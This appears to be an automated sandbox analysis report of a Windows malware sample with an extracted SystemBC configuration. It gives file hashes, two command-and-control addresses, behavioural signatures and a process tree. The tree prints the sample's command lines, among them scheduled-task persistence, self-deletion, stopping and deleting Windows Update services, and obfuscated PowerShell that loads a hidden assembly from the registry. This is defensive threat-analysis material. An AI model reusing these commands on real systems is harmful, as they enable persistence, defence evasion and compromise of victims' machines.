Analysis
-
max time kernel
256s -
max time network
248s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
27-11-2022 04:00
Static task
static1
Behavioral task
behavioral1
Sample
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
Resource
win10-20220901-en
General
-
Target
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
-
Size
1.1MB
-
MD5
01f89dd05027734cdf71f9923179a57a
-
SHA1
f6cbdf1f40fcc5349ff58245cb7d14d5a5113ac0
-
SHA256
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a
-
SHA512
36328e775c5cb77663e8daec6f2d72356146e17201c0340624007f78de4c0ebb20cb4a282dc324893d8088463403a26a6fd2447f4c949d7fe0de00650d2c9bf1
-
SSDEEP
24576:+4j4a/KxTMoQvaBtu+vOQst38HZjbxiOJx7nTlbPujvb+nayzg8vk862s3vX/1rw:+WCGjL+2P8H5b0GnTlLYYDzgI961vXVk
Malware Config
Extracted
systembc
89.22.225.242:4193
195.2.93.22:4193
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
Processes:
hqdsgvj.exedescription pid process target process PID 1524 created 1360 1524 hqdsgvj.exe Explorer.EXE PID 1524 created 1360 1524 hqdsgvj.exe Explorer.EXE PID 1524 created 1360 1524 hqdsgvj.exe Explorer.EXE PID 1524 created 1360 1524 hqdsgvj.exe Explorer.EXE PID 1524 created 1360 1524 hqdsgvj.exe Explorer.EXE PID 1524 created 1360 1524 hqdsgvj.exe Explorer.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pirihoq pereq kiyiw.exehqdsgvj.exepid process 1224 pirihoq pereq kiyiw.exe 1524 hqdsgvj.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1536 cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exetaskeng.exepid process 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe 1632 taskeng.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exehqdsgvj.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe hqdsgvj.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
hqdsgvj.exepid process 1524 hqdsgvj.exe 1524 hqdsgvj.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
hqdsgvj.exedescription pid process target process PID 1524 set thread context of 276 1524 hqdsgvj.exe dialer.exe -
Drops file in Windows directory 1 IoCs
Processes:
pirihoq pereq kiyiw.exedescription ioc process File created C:\Windows\Tasks\lgsvqjctharkdupidun.job pirihoq pereq kiyiw.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 948 sc.exe 896 sc.exe 992 sc.exe 1664 sc.exe 568 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 801ee9671502d901 powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exepirihoq pereq kiyiw.exehqdsgvj.exepowershell.exepid process 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe 1224 pirihoq pereq kiyiw.exe 1224 pirihoq pereq kiyiw.exe 1224 pirihoq pereq kiyiw.exe 1224 pirihoq pereq kiyiw.exe 1224 pirihoq pereq kiyiw.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1404 powershell.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe 1524 hqdsgvj.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exedescription pid process Token: SeShutdownPrivilege 1996 powercfg.exe Token: SeShutdownPrivilege 1836 powercfg.exe Token: SeShutdownPrivilege 1004 powercfg.exe Token: SeShutdownPrivilege 840 powercfg.exe Token: SeDebugPrivilege 1404 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.execmd.exetaskeng.execmd.execmd.exedescription pid process target process PID 1464 wrote to memory of 632 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe schtasks.exe PID 1464 wrote to memory of 632 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe schtasks.exe PID 1464 wrote to memory of 632 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe schtasks.exe PID 1464 wrote to memory of 632 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe schtasks.exe PID 1464 wrote to memory of 1224 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe pirihoq pereq kiyiw.exe PID 1464 wrote to memory of 1224 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe pirihoq pereq kiyiw.exe PID 1464 wrote to memory of 1224 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe pirihoq pereq kiyiw.exe PID 1464 wrote to memory of 1224 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe pirihoq pereq kiyiw.exe PID 1464 wrote to memory of 1536 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe cmd.exe PID 1464 wrote to memory of 1536 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe cmd.exe PID 1464 wrote to memory of 1536 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe cmd.exe PID 1464 wrote to memory of 1536 1464 2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe cmd.exe PID 1536 wrote to memory of 240 1536 cmd.exe chcp.com PID 1536 wrote to memory of 240 1536 cmd.exe chcp.com PID 1536 wrote to memory of 240 1536 cmd.exe chcp.com PID 1536 wrote to memory of 240 1536 cmd.exe chcp.com PID 1536 wrote to memory of 1584 1536 cmd.exe PING.EXE PID 1536 wrote to memory of 1584 1536 cmd.exe PING.EXE PID 1536 wrote to memory of 1584 1536 cmd.exe PING.EXE PID 1536 wrote to memory of 1584 1536 cmd.exe PING.EXE PID 1632 wrote to memory of 1524 1632 taskeng.exe hqdsgvj.exe PID 1632 wrote to memory of 1524 1632 taskeng.exe hqdsgvj.exe PID 1632 wrote to memory of 1524 1632 taskeng.exe hqdsgvj.exe PID 1760 wrote to memory of 1996 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 1996 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 1996 1760 cmd.exe powercfg.exe PID 668 wrote to memory of 568 668 cmd.exe sc.exe PID 668 wrote to memory of 568 668 cmd.exe sc.exe PID 668 wrote to memory of 568 668 cmd.exe sc.exe PID 668 wrote to memory of 1664 668 cmd.exe sc.exe PID 668 wrote to memory of 1664 668 cmd.exe sc.exe PID 668 wrote to memory of 1664 668 cmd.exe sc.exe PID 1760 wrote to memory of 1836 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 1836 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 1836 1760 cmd.exe powercfg.exe PID 668 wrote to memory of 992 668 cmd.exe sc.exe PID 668 wrote to memory of 992 668 cmd.exe sc.exe PID 668 wrote to memory of 992 668 cmd.exe sc.exe PID 668 wrote to memory of 948 668 cmd.exe sc.exe PID 668 wrote to memory of 948 668 cmd.exe sc.exe PID 668 wrote to memory of 948 668 cmd.exe sc.exe PID 1760 wrote to memory of 1004 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 1004 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 1004 1760 cmd.exe powercfg.exe PID 668 wrote to memory of 896 668 cmd.exe sc.exe PID 668 wrote to memory of 896 668 cmd.exe sc.exe PID 668 wrote to memory of 896 668 cmd.exe sc.exe PID 668 wrote to memory of 952 668 cmd.exe reg.exe PID 668 wrote to memory of 952 668 cmd.exe reg.exe PID 668 wrote to memory of 952 668 cmd.exe reg.exe PID 1760 wrote to memory of 840 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 840 1760 cmd.exe powercfg.exe PID 1760 wrote to memory of 840 1760 cmd.exe powercfg.exe PID 668 wrote to memory of 1636 668 cmd.exe reg.exe PID 668 wrote to memory of 1636 668 cmd.exe reg.exe PID 668 wrote to memory of 1636 668 cmd.exe reg.exe PID 668 wrote to memory of 1620 668 cmd.exe reg.exe PID 668 wrote to memory of 1620 668 cmd.exe reg.exe PID 668 wrote to memory of 1620 668 cmd.exe reg.exe PID 668 wrote to memory of 1536 668 cmd.exe reg.exe PID 668 wrote to memory of 1536 668 cmd.exe reg.exe PID 668 wrote to memory of 1536 668 cmd.exe reg.exe PID 668 wrote to memory of 1168 668 cmd.exe reg.exe PID 668 wrote to memory of 1168 668 cmd.exe reg.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"3⤵
- Creates scheduled task(s)
PID:632 -
C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:240
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
PID:1584 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:948 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:896 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:992 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:952
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1664 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:568 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1636
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1620 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1536
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1168
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1004 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vngabyebz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvdrivesllapi' /tr '''C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvdrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvdrivesllapi" /t REG_SZ /f /d 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn nvdrivesllapi /tr 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe'3⤵
- Creates scheduled task(s)
PID:1960 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe"2⤵PID:808
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qisygekiu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvdrivesllapi" } Else { "C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe" }2⤵PID:2004
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn nvdrivesllapi3⤵PID:188
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:276
-
C:\Windows\system32\taskeng.exetaskeng.exe {5EEDE104-05EC-4674-BAB9-269A903F6C53} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\hqdsgvj.exeC:\Users\Admin\AppData\Local\Temp\hqdsgvj.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+''+'s'+''+[Char](116)+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵PID:548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'er'+'s'+''+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵PID:1280
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{083f3b28-d8d6-4a87-b29c-dd355c3f17d3}1⤵PID:1264
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.0MB
MD5ce4164c119c97408d2e97898666ce565
SHA1a1c5d881fa81e69bd56d078e1801d361231d3e9a
SHA256f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2
SHA512683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5
-
Filesize
10.0MB
MD5ce4164c119c97408d2e97898666ce565
SHA1a1c5d881fa81e69bd56d078e1801d361231d3e9a
SHA256f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2
SHA512683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5
-
Filesize
526.9MB
MD55d7bb427a0945fba6de9626394daebec
SHA184fe21bebd8539cba7d7d6462112938847380bb8
SHA25600083b1705a5dbcc982e193fcf547011b699265a30ce3dae14d2cc39530f4922
SHA512e8fa9f03b0ca854e016cddace0f81d2de5e3d34bc971a2221486869f0805c2cc4d6b3345444c2d374036f3fe783605421d0a29b0518796354e2607158343962b
-
Filesize
10.0MB
MD5ce4164c119c97408d2e97898666ce565
SHA1a1c5d881fa81e69bd56d078e1801d361231d3e9a
SHA256f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2
SHA512683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5
-
Filesize
531.6MB
MD5f644a969d4ba3dbf20cb479b558ee856
SHA1eaefb036ca37ebcb8f07098ab262295d84a77337
SHA256fda569deb873a581920a2fccd772952af2dd8d4c5a3a81c078bb564bf302df7e
SHA512f3a550c2075a0260812eb483b05d8d68328fa15b395fefe105901dc5585a52181453e982b8c28fb9e0a5f5de4587f615e54f1c361d17e4f2ac630a75c6d3a869